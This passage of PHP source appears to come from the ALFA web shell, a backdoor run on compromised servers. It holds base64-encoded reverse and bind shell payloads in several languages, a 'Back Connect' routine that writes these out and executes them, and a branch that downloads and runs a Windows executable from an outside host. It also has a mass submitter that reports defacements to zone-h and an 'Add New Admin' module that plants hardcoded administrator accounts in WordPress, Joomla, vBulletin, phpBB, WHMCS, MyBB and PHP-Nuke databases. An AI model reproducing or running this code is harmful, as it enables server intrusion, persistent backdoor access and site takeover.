FeC8ebp2F3ls3D8KwZdmAGJtLEzTkHpghJ6mbsxnn4Bpzy/3C+Fv5GnNL9Cw==";

$perl="lZLRjpNAFIav26TvMOJsC8kYWr1bpJFQ3DRrS8OwGmOVsPSsTKQDgVm3m+722Z0BVifGGL0755/Dd+Abnj+zb5vavmbcBv4dVVAXo+FtA2gZnp/TMvsGwhkNcdm4+EuoqiZ3DThUZS1QHEQr9yCg3jsbOnMnW7z5sNjOJ05/LkOnJTc5esEM+TS7MRXqtLfvZMysY4s788MV3QT+GbIvDedRLhHuVxBVXYry+p6nezAnIqsmliQ07SuZlIw3b5PlOojJmIb+ZULjKPBWBAvr4WHHwLS6bW+86OK9686s42g4wJWLVf9p+lmeDhoQilZWCkfDd4kCSSANkyi4ooG3WERkpkAD+RE7OaTG092uThg3cUWWazWSeOuPlrZ1ULBGAJfjr/Q0zTKQm3xCrW65JPrEOCGvuElRDOke0RyKAp223CDTdqisgCMaL5ZrYrwe+4bzFIRXMTHmehJEUZ/I5+AAGZJqtfVZUTZg+pbTFfRnoehaI8laJ6lWB2QCTWUlLweK5pfYl38Si/O+nXUtcxkHkaSilNpyXQpO3d+cYqafZyXnkKn7wamet/boP9gze3vzMTUs5ynp9elR709FfxP4f946W3BU+kz5Jz3+AA==";

$ruby="tVb7b9M6FP7Z+SuMN0hzVxLGQ+h2N6vGU0ggqjG4QmQXtc5pYy11gu3QoW387fiVrqXt1ivd66p1es7n8/T52p07SSNFMmI8Af4di2b0I9jBhVK17CXJhKmiGcW0miajR08fn7nPQMC3hgnAoazoGajwWlAPVcGHUwiDIIcxlg09kwESoBrB8fHHZ5+/Dt4enbx6f/wuzqsZp0MJ8XSoaNEJp3LG+KV5TxmfzMKor0QDvfGwlBAAz51FAcPSOOlIJSJtOdV7gNgYv2IlxHDOpJJ9r9TagY8n5jCz0rg1EKvqqw7NGDbHbaRYFcCxSEU8kc2ok2RJ0iVZRiJsYT4N4aLRh46OX3+KS+ATVaTpfoD1MqIvD07Tn8k/Xx7c//P0Yr/75Go36dfpG65gAqLjEVFPB6vsGZmePB98APEdhI2TkG4dWQ1NZTykFGoHpHEtGFeY2DZgWUBZ4h6mFedAFeQZJxY3ggnj9sksHSivlO8FXljjlJoqsCUhnAPF0voZdwic15VQ+OTl8bv0XIGYHgw+7Kdhtjv4+0V2GB54vRYe2DskC3yf4eyv7N7dHGeHdnvodtIdm1c09wamsYuu2/TmPSYxifbIIVlCzQrdaVzq2CeglhMySwyZBAxCVOKZqEzypWlGziAT/d1kBe+rU8a0qKZ1mhKyAvEwY4fmOP4jYWshZpVp6e+ORiasG4aRM7zxRHt1cz0/VFXiR79TRhvRzse8QLcgXzChvWvLNwHNZd6k264jCw31ZcpmvRvLtC5pV6etE7oN/p+mBRtNvXkf11UNvFN2iSDRxSWrLlvzrDJsk+8RPZd7K76ugm3D/l22+L19FiBpc33vNfnN6QW4bMR1BjKmZbWQkUw5K4PWluvhErE9tAS5gdi0o1VqO9DSIrXf9k81x5oC+oAc4TrGsz8ejvF2Loory3pIbsFxyBEcQkvUhhAaa760jIaMu/+byFCb2Tzo1QullS1hSUdYWoJuISkbP1rDTMjLF6nIytBm4kHtoTU0g9rDi4zihUvk4US2d3bdmLCty29MsDmKdpBX3S5r/o1z8Mh10ym3nM4lp353m/8zsHbgkJ82E6WbM/1kJwz58XKTZ8FG8gs=";

$node="nVHLasMwEDwrkH8QvliCoEDTW8ih9BPSW/pAtdeRQJZcSXYKIfn2yrKd5tGWYh+Ed2d2NDtquMWu4juNV9jCRy0tkDQTUuVvlTUZOJdSFgnL6aQJZA3+nBrKlPaQ8xZ4eY52nRMhM9oZBRdXda1I6VUEKBUo6fxd6rkTaUBkQXo3rFLcF8aWrOQ+E2T+ugssSen3XFbmDD4hPSlyu20CMCi0ZafZ/jEFeuvFarWg++kEtXwRyGEvlgXzHtZgG7CkqHXmpdHERR5ybGelB5Ic8YMqOH5qV19HD8dnnbT74P7rtgqiMUcSjZ7jTjDnc6mZBVeXQOg1ZGrPws1Jzj1PZoMTTNqa7gcnsVoebpXB2pHjf40Npm+mUXcKpqTzoGPKm7uXtnmYTkA5wNfZ35+ydxfZPxqtoYu9V5nF19wsotx/HgH9lj76IXY0Mm80Mmg0LuHDFw==";

$c="tVJtb9owEP7cSv0PHp1ap/WAsO0TTaWoZBLaChHJNE0bilLHNKcZG8Vmgk7rb98lBArZi/alUqzcPff47nzPnYLicpkJcmVsBrqdX58cn+5hBaj738BMwl0TXJuOXS+E+QNuNP8mbCOghAU8HVCNwFIBVqhAUJbMU1C0NNLinjOepwW5QPP7l6nz4+T4qIwYxpn23D662PCSI4IV0ywrElAEShxmtLzveb3q1hG0Dahkls5Brj3/XTIcBXH/KbDQhfVyq5WhqdVAq4Lu1HH2OGX+tql+FVXS4cgfDCaJP/q84Rlv83JaF2DR+OZ9EsWTwL9l3ZojbEnSC0sNxj8kJaeiJpPgYxSUGdmZZgYehJ5RvW1hRl8YR6zA0jrRHagMU9DGBMiFcwasu3JrmsThCoXEtxufeynnoqrefeoJU3HWeiS+nKUkFumcRLmQkjx+VS3We7MlZstFD4mHnnvg9eqUayw7py2xKkdL4mBy662sKOb9MHK985fhp8H1eb+OIoSm4KSDj+qYnLyCVt2t1EZQXjk/8QhpBNlp+/pZtC23tLI2zN60nveDKPQWYjh1iWPdMi7dy31kl/2fGzEMw8k4HifxTbgTmXKtlOD2r8rWe9GIOY5z1T1Yj0pT87+amobnHnjPoanZaorfLw==";

$java="lVRNb9swDD2nQP+D4JM9BG6T04bCwz6ww4ABHZbeuhwUhbG12rIg0XGCNPvtoz7sumsvPdiWyCfy8ZGybHRrkP3he57LNn93c3khJyYF6G2XF7rb1FIwUXNrGa93/A54c7q8mGkj9xyBWeRIgJ1UvI4wjQwOCGpr2V1lgG8dfjzwXekOV0j2hkl7M3Xddvjkazv0DMgdOGhMn5+dvziQnbCSNpe2oMh+ScbCRTqHUJ9u92CM3MIk7r6VW2Y6lWae5wzNMSxmmyPC/ZptWMEU9Mxv3y8+LNc3wS8VMkFOyuPKTDdZdPSVrCEVH4vrjMVYM2KR90YipJv59VwMUG/f1Z2t0tH0asyz/4S34Ciq9NtBgEbZKgbZCXJSUZEWXDzcGS6Awnmwe4XqY72xY77shkuVkn5SlVQoN6UNIrjK3Dj43MHPRLMlXsnVRqorWyXeJXfp6mgRmrwE/GlaDQaPadLaXPEGkizH9kfbg/nKLRHKpdrC4XaXJr1USebkOcWo9EkC35itd9a/7DONHHMzx1YV1DX7+1uFzJPe9C75F9rbKOGqFQ+ArIp9C9voG7tL1F29eQ2qxKooFrH9M38NCppThBJMrrmxQBuPvr9eD/1YgaFZiqnskGpiTF2gAe242JwL17Gh0aGXUFtg/5NZvpVMEE1qwnrXYj1JPBFB6jmb8Dq/LgV7fGSv85newFK6siun/sQ8jvGzy1m2I3ZqH8HkH27HYKJxEuB+J3TwV6dQNuCOxyVNExxApDQ4WfxPkFo0tYtYMOmsX1CbOyJDAodePqFL90fRLxmO8EVOV8e49unluHyS0b/ecDPpOf8D";

echo "

| Back Connect |


";

echo "


Mehtod:
 Reverse ShellBind Port 
Use:
 ";

$cbArr = array("php"=>"Php","perl"=>"Perl","python"=>"Python","ruby"=>"Ruby","c"=>"C","java"=>"Java","node"=>"NodeJs","bcwin"=>"Windows");

foreach($cbArr as $key=>$val){echo("{$val}");}

echo " 
IP:
 
 
Port: 
  
Run ` nc -l -v -p port ` on your computer and press ` >> ` button

";

if(isset($_POST[`alfa1`])&&!empty($_POST[`alfa1`])){

$lang = $_POST[`alfa1`];

$ip = $_POST[`alfa2`];

$port = $_POST[`alfa3`];

$arg = ($_POST[`alfa4`]==`bind`?$port:$port.` `.$ip);

$tmpdir = ALFA_TEMPDIR;

$name = $tmpdir.`/`.$lang.uniqid().rand(1,99999);

$allow = array(`perl`,`ruby`,`python`,`node`);

eval(`$lan=$`.$lang.`;`);

if(in_array($lang,$allow)){

if(__write_file($name,__get_resource($lan))){

if(_alfa_can_runCommand(true,true)){

$os = ($GLOBALS[`sys`]!=`win`)?`1>/dev/null 2>&1 &`:``;

$out = alfaEx("$lang $name $arg $os");

if($out==``){$out="[ Finished...! ]";}

echo("
{$out}
");

}

}else{

echo("
[ Failed...! ]
");

}

}

if($lang==`java`||$lang==`c`){

$code = __get_resource($lan);

$out = nl2br(bcinit($lang, $code,``,``));

echo("
{$out}
");

}

if($lang==`bcwin`){

$alfa = new AlfaCURL();

$s = $alfa->Send(`http://solevisible.com/bc/windows.exe`);

$tmpdir = ALFA_TEMPDIR;

$f = @fopen($tmpdir.`/bcwin.exe`,`w+`);

@fwrite($f, $s);

@fclose($f);

$out = alfaEx($tmpdir."/bcwin.exe ".$_POST[`alfa2`]." ".$_POST[`alfa3`]);

}

if($lang==`php`){

echo "
";

$code = __get_resource($lan);

if($code!==false){

$code = "$target = "".$arg."";
".$code;

eval($code);

echo("[ Finished...! ]");

}

echo "
";

}

}

echo "
";

alfafooter();

}

function alfazoneh(){

alfahead();

echo `
`;

if(!function_exists(`curl_version`)){

echo "
PHP CURL NOT EXIST ~ ZONE H MASS POSTER DOES NOT WORK
";

}

$hackmode = array(`known vulnerability (i.e. unpatched system)`,`undisclosed (new) vulnerability`,`configuration / admin. mistake`,`brute force attack`,`social engineering`,`Web Server intrusion`,`Web Server external module intrusion`,`Mail Server intrusion`,`FTP Server intrusion`,`SSH Server intrusion`,`Telnet Server intrusion`,`RPC Server intrusion`,`Shares misconfiguration`,`Other Server intrusion`,`SQL Injection`,`URL Poisoning`,`File Inclusion`,`Other Web Application bug`,`Remote administrative panel access bruteforcing`,`Remote administrative panel access password guessing`,`Remote administrative panel access social engineering`,`Attack against administrator(password stealing/sniffing)`,`Access credentials through Man In the Middle attack`,`Remote service password guessing`,`Remote service password bruteforce`,`Rerouting after attacking the Firewall`,`Rerouting after attacking the Router`,`DNS attack through social engineering`,`DNS attack through cache poisoning`,`Not available`,`Cross-Site Scripting`);

$reason = array(`Heh...just for fun!`,`Revenge against that website`,`Political reasons`,`As a challenge`,`I just want to be the best defacer`,`Patriotism`,`Not available`);

echo `


| Zone-h Mass Poster |










`;

$x=1;

foreach($hackmode as $mode){echo(``.$mode.``);$x++;}

echo `
`;

$x=1;

foreach($reason as $mode){echo(``.$mode.``);$x++;}

echo `







`;

if($_POST[`alfa5`] && $_POST[`alfa5`] == `>>`){

ob_start();

$hacker = $_POST[`alfa1`];

$method = $_POST[`alfa2`];

$neden = $_POST[`alfa3`];

$site = $_POST[`alfa4`];

if(empty($hacker)){

die (__pre()."[+] YOU MUST FILL THE ATTACKER NAME [+]");

}elseif($method == "------------------------------------SELECT-------------------------------------"){

die(__pre()."[+] YOU MUST SELECT THE METHOD [+]");

}elseif($neden == "------------------------------------SELECT-------------------------------------"){

die(__pre()."[+] YOU MUST SELECT THE REASON [+]");

}elseif(empty($site)){

die(__pre()."[+] YOU MUST INTER THE SITES LIST [+]");

}

$i = 0;

$sites = explode("
", $site);

$alfa = new AlfaCURL();

while($i < count($sites)){

if(substr($sites[$i], 0, 4) != "http"){

$sites[$i] = "http://".$sites[$i];

}

$alfa->Send("http://www.zone-h.com/notify/single","post","defacer=".$hacker."&domain1=". $sites[$i]."&hackmode=".$method."&reason=".$neden);

++$i;

}

echo __pre()."[+] Sending Sites To Zone-H Has Been Completed Successfully !!![+]";

}

echo "
";

alfafooter();

}

function alfapwchanger(){

alfahead();



echo `

| Add New Admin |


`;

$vals = array(`WordPress` => array(`wp`,2),`Joomla` => array(`joomla`,3),`vBulletin` => array(`vb`,5),`phpBB` => array(`phpbb`,6),`WHMCS` => array(`whmcs`,7),`MyBB` => array(`mybb`,8),`Php Nuke` => array(`nuke`,9),`Drupal` => array(`drupal`,10),`SMF` => array(`smf`,11));

Alfa_Create_A_Tag(`pwchanger`,$vals);

echo ``;

if(isset($_POST[`alfa1`])&&$_POST[`alfa1`]==`wp`){



echo __pre().`
| WordPress |


`.getConfigHtml(`wp`).`
`;

$table = array(`td1` =>

 array(`color` => `FFFFFF`, `tdName` => `Mysql Host`,`id`=>`db_host`, `inputName` => `localhost`, `inputValue` => `localhost`, `inputSize` => `50`),

 `td2` =>

 array(`color` => `FFFFFF`, `tdName` => `Db Name`, `id`=>`db_name`,`inputName` => `database`, `inputValue` => ``, `inputSize` => `50`),

 `td3` =>

 array(`color` => `FFFFFF`, `tdName` => `Db User`, `id`=>`db_user`,`inputName` => `username`, `inputValue` => ``, `inputSize` => `50`),

 `td4` =>

 array(`color` => `FFFFFF`, `tdName` => `Db Pass`, `id`=>`db_pw`,`inputName` => `password`, `inputValue` => ``, `inputSize` => `50`),

 `td5` =>

 array(`color` => `FFFFFF`, `tdName` => `Table Prefix`, `id`=>`db_prefix`,`inputName` => `prefix`, `inputValue` => `wp_`, `inputSize` => `50`),

 `td6` =>

 array(`color` => `FF0000`, `tdName` => `Admin User`, `inputName` => `admin`, `inputValue` => `admin`, `inputSize` => `50`),

 `td7` =>

 array(`color` => `FF0000`, `tdName` => `Admin Pass`, `inputName` => `kh`, `inputValue` => `solevisible`, `inputSize` => `50`, `disabled` => true),

 `td8` =>

 array(`color` => `FF0000`, `tdName` => `Admin Email`, `inputName` => `email`, `inputValue` => `solevisible@fbi.gov`, `inputSize` => `50`)

);

create_table($table);

echo `
`;

if ($_POST[`alfa2`] && $_POST[`alfa2`] == `>>`){

$localhost = $_POST[`alfa3`];

$database = $_POST[`alfa4`];

$username = $_POST[`alfa5`];

$password = $_POST[`alfa6`];

$admin = $_POST[`alfa8`];

$SQL = $_POST[`alfa9`];

$prefix = $_POST[`alfa10`];

$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));

$solevisible=@mysqli_query($conn,"insert into ".$prefix."users (ID,user_login,user_pass,user_email) values(null,`$admin`,`d4a590caacc0be55ef286e40a945ea45`,`$SQL`)") or die(mysqli_error($conn));

$solevisible=@mysqli_query($conn,"select ID from ".$prefix."users where user_login=`".$admin."`") or die(mysqli_error($conn));

$sole = @mysqli_num_rows($solevisible);

if ($sole == 1){

$solevis = @mysqli_fetch_assoc($solevisible);

$res = $solevis[`ID`];

}

$solevisible=@mysqli_query($conn,"insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,`".$res."`,`first_name`,`solevisible`),(null,`".$res."`,`last_name`,`solevisible`),(null,`".$res."`,`nickname`,`solevisible`),(null,`".$res."`,`description`,`solevisible`),(null,`".$res."`,`rich_editing`,`true`),(null,`".$res."`,`comment_shortcuts`,`false`),(null,`".$res."`,`admin_color`,`fresh`),(null,`".$res."`,`use_ssl`,`0`),(null,`".$res."`,`show_admin_bar_front`,`true`),(null,`".$res."`,`".$prefix."capabilities`,`a:1:{s:13:"administrator";b:1;}`),(null,`".$res."`,`".$prefix."user_level`,`10`),(null,`".$res."`,`show_welcome_panel`,`1`),(null,`".$res."`,`".$prefix."dashboard_quick_press_last_post_id`,`3`)") or die(mysqli_error($conn));

if($solevisible){

__alert(`Success... `.$admin.` is created...`);}

}

}

if($_POST[`alfa2`] && $_POST[`alfa2`] == `joomla`){



echo __pre().`
| Joomla |
`.getConfigHtml(`joomla`).`
`;

$table = array(`td1` =>

 array(`color` => `FFFFFF`, `tdName` => `Mysql Host`, `id`=>`db_host`,`inputName` => `localhost`, `inputValue` => `localhost`, `inputSize` => `50`),

 `td2` =>

 array(`color` => `FFFFFF`, `tdName` => `Db Name`, `id`=>`db_name`,`inputName` => `database`, `inputValue` => ``, `inputSize` => `50`),

 `td3` =>

 array(`color` => `FFFFFF`, `tdName` => `Db User`, `id`=>`db_user`,`inputName` => `username`, `inputValue` => ``, `inputSize` => `50`),

 `td4` =>

 array(`color` => `FFFFFF`, `tdName` => `Db Pass`, `id`=>`db_pw`,`inputName` => `password`, `inputValue` => ``, `inputSize` => `50`),

 `td5` =>

 array(`color` => `FFFFFF`, `tdName` => `Table Prefix`, `id`=>`db_prefix`,`inputName` => `prefix`, `inputValue` => `jos_`, `inputSize` => `50`),

 `td6` =>

 array(`color` => `FF0000`, `tdName` => `Admin User`, `inputName` => `admin`, `inputValue` => `admin`, `inputSize` => `50`),

 `td7` =>

 array(`color` => `FF0000`, `tdName` => `Admin Pass`, `inputName` => `toftof`, `inputValue` => `solevisible`, `inputSize` => `50`, `disabled` => true),

 `td8` =>

 array(`color` => `FF0000`, `tdName` => `Admin Email`, `inputName` => `email`, `inputValue` => `solevisible@fbi.gov`, `inputSize` => `50`)

);

create_table($table);

echo `
`;

if ($_POST[`alfa1`] && $_POST[`alfa1`] == `>>`){

$localhost = $_POST[`alfa3`];

$database = $_POST[`alfa4`];

$username = $_POST[`alfa5`];

$password = $_POST[`alfa6`];

$admin = $_POST[`alfa8`];

$SQL = $_POST[`alfa9`];

$prefix = $_POST[`alfa10`];

$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));

$solevisible=@mysqli_query($conn,"insert into ".$prefix."users (id,name,username,email,password) values(null,`Super User`,`".$admin."`,`".$SQL."`,`d4a590caacc0be55ef286e40a945ea45`)") or die(mysqli_error($conn));

$solevisible=@mysqli_query($conn,"select id from ".$prefix."users where username=`".$admin."`") or die(mysqli_error($conn));

$sole =@mysqli_num_rows($solevisible);

if ($sole == 1){

$solevis =@mysqli_fetch_assoc($solevisible);

$res = $solevis[`id`];

}

$solevisible=@mysqli_query($conn,"INSERT INTO ".$prefix."user_usergroup_map (user_id,group_id) VALUES (`".$res."`, `8`)") or die(mysqli_error($conn));

if($solevisible){

__alert(`Success... `.$admin.` is created...`);}

}

}

if($_POST[`alfa4`] && $_POST[`alfa4`] == `vb`){



echo __pre().`
| vBulletin |
`.getConfigHtml(`vb`).`
`;

$table = array(`td1` =>

 array(`color` => `FFFFFF`, `tdName` => `Mysql Host`, `id`=>`db_host`,`inputName` => `localhost`, `inputValue` => `localhost`, `inputSize` => `50`),

 `td2` =>

 array(`color` => `FFFFFF`, `tdName` => `Db Name`, `id`=>`db_name`,`inputName` => `database`, `inputValue` => ``, `inputSize` => `50`),

 `td3` =>

 array(`color` => `FFFFFF`, `tdName` => `Db User`, `id`=>`db_user`,`inputName` => `username`, `inputValue` => ``, `inputSize` => `50`),

 `td4` =>

 array(`color` => `FFFFFF`, `tdName` => `Db Pass`, `id`=>`db_pw`,`inputName` => `password`, `inputValue` => ``, `inputSize` => `50`),

 `td5` =>

 array(`color` => `FFFFFF`, `tdName` => `Table Prefix`, `id`=>`db_prefix`,`inputName` => `prefix`, `inputValue` => ``, `inputSize` => `50`),

 `td6` =>

 array(`color` => `FF0000`, `tdName` => `Admin User`, `inputName` => `admin`, `inputValue` => `admin`, `inputSize` => `50`),

 `td7` =>

 array(`color` => `FF0000`, `tdName` => `Admin Pass`, `inputName` => `hi`, `inputValue` => `solevisible`, `inputSize` => `50`, `disabled` => true),

 `td8` =>

 array(`color` => `FF0000`, `tdName` => `Admin Email`, `inputName` => `email`, `inputValue` => `solevisible@fbi.gov`, `inputSize` => `50`)

);

create_table($table);

echo `
`;

if($_POST[`alfa1`] && $_POST[`alfa1`] == `>>`){

$localhost = $_POST[`alfa2`];

$database = $_POST[`alfa3`];

$username = $_POST[`alfa5`];

$password = $_POST[`alfa6`];

$prefix = $_POST[`alfa7`];

$admin = $_POST[`alfa8`];

$SQL = $_POST[`alfa9`];

$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));

$solevisible=@mysqli_query($conn,"insert into {$prefix}user (userid,usergroupid,username,password,salt,email,passworddate,joindate) values(null,`6`,`$admin`,`52e28b78f55641cd4618ad1a20f5fd5c`,`Xw|IbGLhTQA-AwApVv>61y^(z]*
$solevisible=@mysqli_query($conn,"select userid from {$prefix}user where username=`".$admin."`") or die(mysqli_error($conn));

$sole = mysqli_num_rows($solevisible);

if($sole == 1){

$solevis = mysqli_fetch_assoc($solevisible);

$res = $solevis[`userid`];

}

$solevisible=@mysqli_query($conn,"insert into {$prefix}administrator (userid,adminpermissions) values(`".$res."`,`16744444`)") or die(mysqli_error($conn));

if($solevisible){

__alert(`Success... `.$admin.` is created...`);}

}

}

if(isset($_POST[`alfa5`]) && $_POST[`alfa5`] == `phpbb`){



echo __pre().`
| phpBB |
`.getConfigHtml(`phpbb`).`
`;

$table = array(`td1` =>

 array(`color` => `FFFFFF`, `tdName` => `Mysql Host`, `id`=>`db_host`,`inputName` => `localhost`, `inputValue` => `localhost`, `inputSize` => `50`),

 `td2` =>

 array(`color` => `FFFFFF`, `tdName` => `Db Name`, `id`=>`db_name`,`inputName` => `database`, `inputValue` => ``, `inputSize` => `50`),

 `td3` =>

 array(`color` => `FFFFFF`, `tdName` => `Db User`, `id`=>`db_user`,`inputName` => `username`, `inputValue` => ``, `inputSize` => `50`),

 `td4` =>

 array(`color` => `FFFFFF`, `tdName` => `Db Pass`, `id`=>`db_pw`,`inputName` => `password`, `inputValue` => ``, `inputSize` => `50`),

 `td5` =>

 array(`color` => `FFFFFF`, `tdName` => `Table Prefix`, `id`=>`db_prefix`,`inputName` => `prefix`, `inputValue` => ``, `inputSize` => `50`),

 `td6` =>

 array(`color` => `FF0000`, `tdName` => `Admin User`, `inputName` => `admin`, `inputValue` => `admin`, `inputSize` => `50`),

 `td7` =>

 array(`color` => `FF0000`, `tdName` => `Admin Pass`, `inputName` => `toftof`, `inputValue` => `solevisible`, `inputSize` => `50`, `disabled` => true),

 `td8` =>

 array(`color` => `FF0000`, `tdName` => `Admin Email`, `inputName` => `email`, `inputValue` => `solevisible@fbi.gov`, `inputSize` => `50`)

);

create_table($table);

echo `
`;

if ($_POST[`alfa1`] && $_POST[`alfa1`] == `>>`){

$localhost = $_POST[`alfa2`];

$database = $_POST[`alfa3`];

$username = $_POST[`alfa4`];

$password = $_POST[`alfa6`];

$admin = $_POST[`alfa8`];

$SQL = $_POST[`alfa9`];

$prefix = $_POST[`alfa10`];

$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));

$hash = md5(`solevisible`);

$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET username_clean =`".$admin."` WHERE username_clean = `admin`") or die(mysqli_error($conn));

$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_password =`".$hash."` WHERE username_clean = `admin`") or die(mysqli_error($conn));

$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET username_clean =`".$admin."` WHERE user_type = 3") or die(mysqli_error($conn));

$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_password =`".$hash."` WHERE user_type = 3") or die(mysqli_error($conn));

$solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_email =`".$SQL."` WHERE username_clean = `admin`") or die(mysqli_error($conn));

if($solevisible){

__alert(`Success... `.$admin.` is created...`);

}

}

}

if(isset($_POST[`alfa6`]) && $_POST[`alfa6`] == `whmcs`){



echo __pre().`
| Whmcs |
`.getConfigHtml(`whmcs`).`
`;

$table = array(`td1` =>

 array(`color` => `FFFFFF`, `tdName` => `Mysql Host`, `id`=>`db_host`,`inputName` => `localhost`, `inputValue` => `localhost`, `inputSize` => `50`),

 `td2` =>

 array(`color` => `FFFFFF`, `tdName` => `Db Name`, `id`=>`db_name`,`inputName` => `database`, `inputValue` => ``, `inputSize` => `50`),

 `td3` =>

 array(`color` => `FFFFFF`, `tdName` => `Db User`, `id`=>`db_user`,`inputName` => `username`, `inputValue` => ``, `inputSize` => `50`),

 `td4` =>

 array(`color` => `FFFFFF`, `tdName` => `Db Pass`, `id`=>`db_pw`,`inputName` => `password`, `inputValue` => ``, `inputSize` => `50`),

 `td6` =>

 array(`color` => `FF0000`, `tdName` => `Admin User`, `inputName` => `admin`, `inputValue` => `admin`, `inputSize` => `50`),

 `td7` =>

 array(`color` => `FF0000`, `tdName` => `Admin Pass`, `inputName` => `toftof`, `inputValue` => `solevisible`, `inputSize` => `50`, `disabled` => true),

 `td8` =>

 array(`color` => `FF0000`, `tdName` => `Admin Email`, `inputName` => `email`, `inputValue` => `solevisible@fbi.gov`, `inputSize` => `50`)

);

create_table($table);

echo `
`;

if ($_POST[`alfa1`] && $_POST[`alfa1`] == `>>`){

$localhost = $_POST[`alfa2`];

$database = $_POST[`alfa3`];

$username = $_POST[`alfa4`];

$password = $_POST[`alfa5`];

$admin = $_POST[`alfa8`];

$SQL = $_POST[`alfa9`];

$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));

$solevisible=@mysqli_query($conn,"insert into tbladmins (id,roleid,username,password,email,template,homewidgets) values(null,`1`,`".$admin."`,`d4a590caacc0be55ef286e40a945ea45`,`".$SQL."`,`blend`,`getting_started:true,orders_overview:true,supporttickets_overview:true,my_notes:true,client_activity:true,open_invoices:true,activity_log:true|income_overview:true,system_overview:true,whmcs_news:true,sysinfo:true,admin_activity:true,todo_list:true,network_status:true,income_forecast:true|`)") or die(mysqli_error($conn));

if($solevisible){

__alert(`Success... `.$admin.` is created...`);}

}

}

if(isset($_POST[`alfa7`]) && $_POST[`alfa7`] == `mybb`){



echo __pre().`
| Mybb |
`.getConfigHtml(`mybb`).`
`;

$table = array(`td1` =>

 array(`color` => `FFFFFF`, `tdName` => `Mysql Host`, `id`=>`db_host`,`inputName` => `localhost`, `inputValue` => `localhost`, `inputSize` => `50`),

 `td2` =>

 array(`color` => `FFFFFF`, `tdName` => `Db Name`, `id`=>`db_name`,`inputName` => `database`, `inputValue` => ``, `inputSize` => `50`),

 `td3` =>

 array(`color` => `FFFFFF`, `tdName` => `Db User`, `id`=>`db_user`,`inputName` => `username`, `inputValue` => ``, `inputSize` => `50`),

 `td4` =>

 array(`color` => `FFFFFF`, `tdName` => `Db Pass`, `id`=>`db_pw`,`inputName` => `password`, `inputValue` => ``, `inputSize` => `50`),

 `td5` =>

 array(`color` => `FFFFFF`, `tdName` => `Table Prefix`, `id`=>`db_prefix`,`inputName` => `prefix`, `inputValue` => ``, `inputSize` => `50`),

 `td6` =>

 array(`color` => `FF0000`, `tdName` => `Admin User`, `inputName` => `admin`, `inputValue` => `admin`, `inputSize` => `50`),

 `td7` =>

 array(`color` => `FF0000`, `tdName` => `Admin Pass`, `inputName` => `toftof`, `inputValue` => `solevisible`, `inputSize` => `50`, `disabled` => true),

 `td8` =>

 array(`color` => `FF0000`, `tdName` => `Admin Email`, `inputName` => `email`, `inputValue` => `solevisible@fbi.gov`, `inputSize` => `50`)

);

create_table($table);

echo `
`;

if ($_POST[`alfa1`] && $_POST[`alfa1`] == `>>`){

$localhost = $_POST[`alfa2`];

$database = $_POST[`alfa3`];

$username = $_POST[`alfa4`];

$password = $_POST[`alfa5`];

$admin = $_POST[`alfa8`];

$SQL = $_POST[`alfa9`];

$prefix = $_POST[`alfa10`];

$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));

$solevisible=@mysqli_query($conn,"insert into ".$prefix."users (uid,username,password,salt,email,usergroup) values(null,`".$admin."`,`e71f2c3265619038d826a1ac6e2b9b8e`,`ywza68lS`,`".$SQL."`,`4`)") or die(mysqli_error($conn));

if($solevisible){

__alert(`Success... `.$admin.` is created...`);}

}

}

if(isset($_POST[`alfa8`]) && $_POST[`alfa8`] == `nuke`){



echo __pre().`
| PhpNuke |
`.getConfigHtml(`phpnuke`).`
`;

$table = array(`td1` =>

 array(`color` => `FFFFFF`, `tdName` => `Mysql Host`, `id`=>`db_host`,`inputName` => `localhost`, `inputValue` => `localhost`, `inputSize` => `50`),

 `td2` =>

 array(`color` => `FFFFFF`, `tdName` => `Db Name`, `id`=>`db_name`,`inputName` => `database`, `inputValue` => ``, `inputSize` => `50`),

 `td3` =>

 array(`color` => `FFFFFF`, `tdName` => `Db User`, `id`=>`db_user`,`inputName` => `username`, `inputValue` => ``, `inputSize` => `50`),

 `td4` =>

 array(`color` => `FFFFFF`, `tdName` => `Db Pass`, `id`=>`db_pw`,`inputName` => `password`, `inputValue` => ``, `inputSize` => `50`),

 `td5` =>

 array(`color` => `FFFFFF`, `tdName` => `Table Prefix`, `id`=>`db_prefix`,`inputName` => `prefix`, `inputValue` => ``, `inputSize` => `50`),

 `td6` =>

 array(`color` => `FF0000`, `tdName` => `Admin User`, `inputName` => `admin`, `inputValue` => `admin`, `inputSize` => `50`),

 `td7` =>

 array(`color` => `FF0000`, `tdName` => `Admin Pass`, `inputName` => `toftof`, `inputValue` => `solevisible`, `inputSize` => `50`, `disabled` => true),

 `td8` =>

 array(`color` => `FF0000`, `tdName` => `Admin Email`, `inputName` => `email`, `inputValue` => `solevisible@fbi.gov`, `inputSize` => `50`)

);

create_table($table);

echo `
`;

if ($_POST[`alfa1`] && $_POST[`alfa1`] == `>>`){

$localhost = $_POST[`alfa2`];

$database = $_POST[`alfa3`];

$username = $_POST[`alfa4`];

$password = $_POST[`alfa5`];

$admin = $_POST[`alfa7`];

$SQL = $_POST[`alfa9`];

$prefix = $_POST[`alfa10`];

$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));

$hash = md5($pwd);

$solevisible=@mysqli_query($conn,"insert into ".$prefix."_authors(aid,name,email,pwd) values(`$admin`,`God`,`$SQL`,`d4a590caacc0be55ef286e40a945ea45`)") or die(mysqli_error($conn));

if($solevisible){

__alert(`Success... `.$admin.` is created...`);}

}

}

if(isset($_POST[`alfa9`]) && $_POST[`alfa9`] == `drupal`){



echo __pre().`
| Drupal |
`.getConfigHtml(`drupal`).`
`;

$table = array(`td1` =>

 array(`color` => `FFFFFF`, `tdName` => `Mysql Host`, `id`=>`db_host`,`inputName` => `localhost`, `inputValue` => `localhost`, `inputSize` => `50`),

 `td2` =>

